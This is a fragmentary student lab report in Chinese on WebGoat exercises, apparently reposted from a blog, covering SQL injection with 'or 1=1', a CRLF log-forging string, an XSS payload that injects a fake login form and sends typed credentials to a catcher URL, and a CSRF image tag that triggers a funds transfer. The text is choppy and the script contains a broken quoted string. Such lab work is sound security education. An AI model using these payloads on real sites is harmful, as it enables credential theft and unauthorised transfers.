目录
inspect Element
f12
查看网页源代码view
按钮,执行代码结果如下:value=‘101‘
进行修改,添加or 1=1
构成永真式,如图:2329%0d%0aLogin Succeeded for username: 162329
其中%0d
和%0a
为回车符和换行符。<form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name = "pass"><br>
</form><br><br><HR>
<script>
function hack()
{
alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + ";
}
</script>
<img src="http://localhost:8080/WebGoat/attack? Screen=261&menu=900&transferFunds=2329"/>
点击提交后结果如下:通过本次实验真实的感受了什么是SQL注入,XSS攻击和CRSF攻击,在实验中了解了其中的流程,也自己总结了对这些攻击的防御方法,感觉受益匪浅。
2018-2019-2 20162329 《网络对抗技术》Exp9: Web安全基础
原文:https://www.cnblogs.com/Zhangxusheng/p/10926028.html